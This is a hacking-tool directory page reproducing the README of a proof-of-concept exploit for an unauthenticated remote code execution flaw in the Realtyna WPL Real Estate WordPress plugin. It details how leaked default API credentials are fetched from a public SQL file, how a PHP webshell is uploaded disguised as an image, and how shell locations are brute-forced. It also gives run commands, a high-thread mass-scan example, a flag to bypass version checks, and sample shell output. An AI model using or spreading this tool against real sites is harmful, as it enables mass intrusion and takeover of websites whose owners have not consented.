Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
Tools/GitHubGitHub/madexploits/cve-2026-14483
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

View Repository
118 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-14483 — WPL Real Estate RCE

Unauthenticated remote code execution against the Realtyna WPL Real Estate Listing WordPress plugin.

FieldDetail
CVECVE-2026-14483
Affected version<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
ImpactUnauthenticated PHP webshell upload (RCE)
ScriptCVE-2026-14483.py
AuthorMADEXPLOITS

By default the script only exploits targets running WPL 5.2.0. Use --force to override.

IMAGE


Vulnerability summary

  1. Credential leak — Default api_key / api_secret are exposed via a public SQL migration dump.
  2. Unauthenticated upload — Those credentials authenticate the WPL I/O API (set_property), allowing a crafted PHP file to be uploaded as a property image.
  3. Webshell discovery — The uploaded shell is located under wp-content/uploads/WPL/{property_id}/.

Requirements

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Network access to the target(s)

Usage

Target list

Create a text file with one base URL per line:

root@kitploit:~
http://wplab.test
https://example.com

Basic run

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

Successful shell URLs are appended to result.txt (or --output).

Full options

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force

Exploit flow

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Default shell marker: MADEXPLOITS
Default remote filename: 0x89MADEXPLOITS.php


Examples

Single lab target (this workspace):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Mass scan with higher concurrency:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Force exploit when version check fails:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Output

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt contains one shell URL per line.


Notes

  • Version is read from Stable tag: / Version: in the plugin readme.txt, with fallback to wpl.php.
  • If the shell is not found after upload, raise --max-id.
  • Intended for authorized security testing / local lab use only.
Download Tool
ArgumentDefaultDescription
--targets(required)File with base URLs (one per line)
--outputresult.txtFile to append found shell URLs
--user-id1WordPress / WPL user ID that owns the new property
--payloadbuilt-in upload shellCustom PHP payload string
--max-id1000Max property ID to brute-force when locating the shell
--timeout30HTTP timeout in seconds
--threads5Concurrent worker threads
--debugoffVerbose debug logging
--forceoffExploit even if version ≠ 5.2.0 or version cannot be detected